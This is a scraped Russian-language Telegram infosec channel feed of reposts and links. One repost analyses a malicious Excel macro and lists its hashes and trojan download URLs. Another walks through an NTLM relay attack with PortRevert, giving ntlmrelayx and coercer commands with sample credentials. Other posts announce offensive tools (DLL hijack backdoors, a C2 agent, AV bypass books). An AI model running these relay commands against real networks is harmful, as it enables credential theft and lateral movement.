Fsecurity | HH

Open in Telegram

Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb

Russia216 974 Technologies & Applications31 271

2 018

Subscribers

-224 hours

+17 days

-1430 days

118

Post views

~ 6724 hours

~ 8148 hours

5.85%

Engagement rate

~ 3

Posts per day

Ads index

beta

Posts Archive

2 018

🔗Ссылка: https://habr.com/ru/articles/938760/

2 018

Repost from 1N73LL1G3NC3

DllShimmer Weaponize DLL hijacking easily. Backdoor any function in any DLL without disrupting normal process operation.

2 018

🔗Ссылка: https://linuxcommandlibrary.com/

2 018

Repost from CYBERDEN | Хакинг и Кибербезопасность

The Antivirus Hacker's Handbook-Wiley .pdf5.66 MB

2 018

Repost from CYBERDEN | Хакинг и Кибербезопасность

Так или иначе, тем кто занимается «внутрянкой» приходится сталкиваться с обходом АВПО для достижения поставленных целей. Именно про техники «байпасса» и будут следующие две книги:

2 018

Repost from SecuriXy.kz

Нашли и разобрали файл недавно задетекченный коллегой и товарищем https://t.me/qcakz/1639 файл на госзакупках. В exif все чисто, Хешики:

MD5 (Invoice.xlsm) = 7c7810a88a362df9453eb2adf63c8f73

SHA256 (Invoice.xlsm) = dc948b5fe49705e0f8e790b378477bed6f458c682562d7ded67cbd0abb9ad433

Чистой воды макрос оказался. Назначение: Скачивание и исполнение троянца Synaptics.exe, сохраненного как ~$cache1.exe C2 (Command & Control) / источники загрузки:

https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

Обе линки загрузчика мертвые, но тем не менее, будьте бдительны и не открывайте подозрительные или не известные файлы.

2 018

🔗Ссылка: https://opennet.ru/63753/

2 018

Repost from Кибер ПТУ | Кибербезопасность

Сегодня у нас чтиво о защите периметра сети - Архитектура защищённости сетей. В данной книге разбираются такие типы СЗИ как NGFW, Email Security, WAF и Sandbox. Список самих обозреваемых решений довольно большой, начиная от циски и майкрософта, заканчивая нашими решениями от PT, Usergate и т.д. Прочитав эту книгу вы сможете понять, цель каждого из описанных СЗИ и в какую часть сети их нужно внедрять. #AppSec #DevSecOps #SecArch 🧠 Пакет Знаний | 👨‍🏫 Менторство 📂 Другие каналы

2 018

Repost from 1N73LL1G3NC3

🐶 vCenterHound Collect infrastructure and permissions data from vCenter and export it as a BloodHound‑compatible graph using Custom Nodes/Edges

2 018

Repost from Adaptix Framework

В начале месяца мне на глаза попался репозиторий PIC агента Kharon. Несмотря на то, что он находится в активной разработке, я решил выделить денек-второй, чтобы встроить его в AdaptixC2. Как итог, за 11 часов удалось разобраться в работе самой нагрузки, а также написать экстендеры листенера и агента. Агент отлично работает, поддерживает браузеры файловой системы и процессов, при этом код агента не был никак модифицирован или изменен, работает сразу с оригинального репозитория на гитхаб.

2 018

🔗Ссылка: https://www.securitylab.ru/news/562548.php?r=1

2 018

🔗Ссылка: https://github.com/prowler-cloud/prowler

2 018

🔗Ссылка: https://securelist.ru/pipemagic/113276/

2 018

Repost from #memekatz

Реальность сегодняшнего дня - AI Every where…

2 018

🔗Ссылка: https://www.securitylab.ru/news/562490.php P.s. уже кидал разбор, но вот ещё

2 018

🔗Ссылка: https://github.com/onhexgroup/Conferences/tree/main/BlackHat_USA_2025_Slides

2 018

Использовали VPN из списка?

Anonymous voting

2 018

Repost from SecAtor

Ресерчеры Citizen Lab выкатили результаты своих исследований безопасности ряда популярных VPN-приложений, доступных в магазине Google Play. Оказалось, что многие из VPN-приложений реализуются с одним и тем же паролем Shadowsocks, жёстко зашитым в исходный код, который позволяет владельцам таких приложений расшифровывать пользовательский трафик. Причем, по данным CitizenLab, эти приложения зарегистрированы на три подставные компании, управление которыми осуществляется с территории Китая. Другие весьма интригующие детали представлены в отчете (PDF) и, вероятно, приоткроют для многих завесу в вопросах «безопасности и конфиденциальности» при использовании подобных сервисов.

2 018

Repost from Похек

Мой коллега-внутрянщик написал очень полезный инструмент PortRevert #AD #pentest #Microsoft #NTLM #relay PortRevert — этот инструмент перехватывает SMB трафик на порт 445 и перенаправляет его на порт 4445, позволяя использовать ntlmrelayx без остановки службы LanmanServer (которая слушает порт 445). ➡️Возможности - Перехват всего TCP трафика на порт 445 - Перенаправление на порт 4445 для ntlmrelayx - Автоматическая обработка двунаправленного трафика (запросы/ответы) - Корректная очистка драйвера при завершении - Поддержка как x86, так и x64 архитектур ➡️Использование Пример использования для NTLM relay 1. Запустите PortRevert от имени администратора:

PortRevert.exe

2. Запустите ntlmrelayx на порту 4445:

ntlmrelayx.exe -smb-port 4445 -smb2support -debug

3. Принудите жертву к аутентификации любым способом, например с помощью coercer:

coercer coerce -d cs.org -t dc1 -u test -p 'Password123!' -l pc3 --always-continue

(PortRevert должен быть запущен на хосте-слушателе, в данном случае - pc3)

➡️Как это работает

Жертва -> Порт 445 
    ↓ (перехват PortRedirector)
Жертва -> Порт 4445 -> ntlmrelayx
    ↓ (ответы)
ntlmrelayx -> Порт 4445 
    ↓ (перенаправление обратно)
ntlmrelayx -> Порт 445 -> Жертва

💻 Github repo 🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK

2 018

🔗Ссылка: https://opennet.ru/63740/